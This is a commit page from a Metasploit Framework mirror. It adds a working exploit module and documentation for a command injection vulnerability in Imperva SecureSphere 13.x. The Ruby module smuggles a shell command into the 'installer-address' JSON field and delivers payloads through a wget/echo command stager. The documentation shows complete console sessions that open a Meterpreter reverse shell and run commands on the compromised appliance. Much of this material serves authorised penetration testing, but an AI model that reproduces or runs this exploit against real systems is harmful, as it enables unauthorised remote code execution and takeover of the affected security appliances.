infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #11210, imperva_securesphere_exec exploit

4.x
William Vu 2019-03-05 21:52:13 -06:00 committed by Metasploit
parent 44d6b0b4b8
commit db25dc7148
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 348 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

205
documentation/modules/exploit/linux/http/imperva_securesphere_exec.md Normal file
View File

@ -0,0 +1,205 @@
## Description
This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.
## Vulnerable Application
Imperva SecureSphere 13.0/13.1/13.2
## Verification Steps
1. `use exploit/linux/http/imperva_securesphere_exec`
2. `set RHOST [TARGET IP]`
3. `set PASS [Agent registration password]` if the target has been set to gateway mode
4. Run `check`
5. Verify that the result is `The target is vulnerable.`
6. `set payload linux/x64/meterpreter/reverse_tcp`
7. `set LHOST [IP]`
8. Run `exploit`
9. Verify that the reverse shell is obtained
## Scenarios
Imperva Secure 13.0 Pre-FTL mode:
```
msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
RHOST => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > show options
Module options (exploit/linux/http/imperva_securesphere_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS no Agent registration password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Use SSL
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /pws/impcli no The URI path to impcli
TIMEOUT 3 no HTTP connection timeout
URIPATH no The URI to use for this exploit (default is random)
USER imperva no Agent registration username
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.146.215 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Imperva SecureSphere 13.0/13.1/13.2
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Sending stage (816260 bytes) to 192.168.146.201
[*] Command Stager progress - 100.00% done (1321/1321 bytes)
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 4965 created.
Channel 1 created.
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1331 errors:0 dropped:0 overruns:0 frame:0
TX packets:825 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1790319 (1.7 MiB) TX bytes:83116 (81.1 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit
```
Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):
```
msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
RHOST => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
PASS => lshy5782%lsLS
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > show options
Module options (exploit/linux/http/imperva_securesphere_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS lshy5782%lsLS no Agent registration password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Use SSL
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /pws/impcli no The URI path to impcli
TIMEOUT 3 no HTTP connection timeout
URIPATH no The URI to use for this exploit (default is random)
USER imperva no Agent registration username
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.146.215 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Imperva SecureSphere 13.0/13.1/13.2
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Sending stage (816260 bytes) to 192.168.146.201
[*] Command Stager progress - 100.00% done (1321/1321 bytes)
meterpreter > sysinfo
Computer : 192.168.146.201
OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 19634 created.
Channel 1 created.
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:651 errors:0 dropped:0 overruns:0 frame:0
TX packets:451 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:894174 (873.2 KiB) TX bytes:37181 (36.3 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:153 errors:0 dropped:0 overruns:0 frame:0
TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:21579 (21.0 KiB) TX bytes:21579 (21.0 KiB)
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit
```

143
modules/exploits/linux/http/imperva_securesphere_exec.rb Normal file
View File

@ -0,0 +1,143 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Imperva SecureSphere PWS Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in Imperva
SecureSphere 13.x. The vulnerability exists in the PWS service,
where Python CGIs didn't properly sanitize user supplied command
parameters and directly passes them to corresponding CLI utility,
leading to command injection. Agent registration credential is
required to exploit SecureSphere in gateway mode.
This module was successfully tested on Imperva SecureSphere 13.0/13.1/
13.2 in pre-ftl mode and unsealed gateway mode.
),
'License' => MSF_LICENSE,
'Author' =>
[
'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module
],
'References' =>
[
[ 'EDB', '45542' ]
],
'DisclosureDate' => "Oct 8 2018",
'DefaultOptions' => {
'SSL' => true,
'PrependFork' => true,
},
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'CmdStagerFlavor' => %w{ echo printf wget },
'Targets' =>
[
['Imperva SecureSphere 13.0/13.1/13.2', {}]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Agent registration username', 'imperva']),
OptString.new('PASSWORD', [true, 'Agent registration password', '']),
OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])
])
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def check
begin
res = execute_command('id')
rescue => e
vprint_error("#{e}")
return CheckCode::Unknown
end
if res.body =~ /uid=\d+/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def exploit
unless CheckCode::Vulnerable == check
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning 'Target does not appear to be vulnerable'
end
print_status("Sending payload #{datastore['PAYLOAD']}")
execute_cmdstager
end
def execute_command(cmd, opts = {})
data = {
'command' => 'impctl server status',
'parameters' => {
'broadcast' => true,
'installer-address' => "127.0.0.1 $(#{cmd})"
}
}
res = send_request data
return unless res
if res.code == 401
fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')
end
unless res.code == 406 && res.body.include?("impctl")
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
res
end
def send_request(data)
req_params = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'data' => data.to_json
}
if datastore['USERNAME'] && datastore['PASSWORD']
unless @cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
@cookie = res.get_cookies
end
req_params['cookie'] = @cookie
req_params['headers'] = {
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
}
end
send_request_cgi(req_params, datastore['TIMEOUT'])
end
end